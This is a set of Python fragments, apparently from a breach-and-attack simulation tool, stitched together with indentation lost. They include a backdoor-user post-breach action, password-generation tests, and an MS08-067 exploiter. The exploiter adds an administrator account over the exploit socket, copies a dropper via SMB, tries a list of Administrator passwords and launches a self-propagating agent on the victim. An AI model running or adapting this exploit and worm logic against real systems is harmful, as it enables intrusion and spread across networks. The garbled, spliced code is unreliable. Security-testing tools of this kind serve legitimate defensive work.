def __init__(self):
random_password = get_random_password()
linux_cmds, windows_cmds = get_commands_to_add_user(
WormConfiguration.user_to_add, random_password)
super(BackdoorUser, self).__init__(POST_BREACH_BACKDOOR_USER,
linux_cmd=" ".join(linux_cmds),
windows_cmd=windows_cmds)
def run(self):
username = CommunicateAsBackdoorUser.get_random_new_user_name()
try:
password = get_random_password(14)
with create_auto_new_user(username, password) as new_user:
http_request_commandline = (
CommunicateAsBackdoorUser.get_commandline_for_http_request(
INFECTION_MONKEY_WEBSITE_URL
)
)
exit_status = new_user.run_as(http_request_commandline)
self.send_result_telemetry(exit_status, http_request_commandline, username)
except subprocess.CalledProcessError as e:
PostBreachTelem(self, (e.output.decode(), False)).send()
except NewUserError as e:
PostBreachTelem(self, (str(e), False)).send()
def test_get_random_password__randomness():
random_password1 = get_random_password()
random_password2 = get_random_password()
assert not random_password1 == random_password2
def test_get_random_password__length():
password_byte_length = len(get_random_password().encode())
# 32 is the recommended secure byte length for secrets
assert password_byte_length >= 32
def test_get_random_password__custom_length():
password_length = len(get_random_password(14))
assert password_length == 14
def _exploit_host(self):
src_path = get_target_monkey(self.host)
if not src_path:
logger.info("Can't find suitable monkey executable for host %r",
self.host)
return False
os_version = self._windows_versions.get(self.host.os.get("version"),
WindowsVersion.Windows2003_SP2)
exploited = False
random_password = get_random_password()
for _ in range(self._config.ms08_067_exploit_attempts):
exploit = SRVSVC_Exploit(target_addr=self.host.ip_addr,
os_version=os_version)
try:
sock = exploit.start()
sock.send(
"cmd /c (net user {} {} /add) &&"
" (net localgroup administrators {} /add)\r\n".format(
self._config.user_to_add,
random_password,
self._config.user_to_add,
).encode())
time.sleep(2)
sock.recv(1000)
logger.debug("Exploited into %r using MS08-067", self.host)
exploited = True
break
except Exception as exc:
logger.debug("Error exploiting victim %r: (%s)", self.host,
exc)
continue
if not exploited:
logger.debug("Exploiter MS08-067 is giving up...")
return False
# copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(
self.host,
src_path,
self._config.dropper_target_path_win_32,
self._config.user_to_add,
random_password,
)
if not remote_full_path:
# try other passwords for administrator
for password in self._config.exploit_password_list:
remote_full_path = SmbTools.copy_file(
self.host,
src_path,
self._config.dropper_target_path_win_32,
"Administrator",
password,
)
if remote_full_path:
break
if not remote_full_path:
return True
# execute the remote dropper in case the path isn't final
if remote_full_path.lower(
) != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path": remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
SRVSVC_Exploit.TELNET_PORT,
self._config.dropper_target_path_win_32,
)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {
"monkey_path": remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
vulnerable_port=SRVSVC_Exploit.TELNET_PORT)
try:
sock.send(("start %s\r\n" % (cmdline, )).encode())
sock.send(("net user %s /delete\r\n" %
(self._config.user_to_add, )).encode())
except Exception as exc:
logger.debug(
"Error in post-debug phase while exploiting victim %r: (%s)",
self.host, exc)
return True
finally:
try:
sock.close()
except socket.error:
pass
logger.info(
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
remote_full_path,
self.host,
cmdline,
)
return True
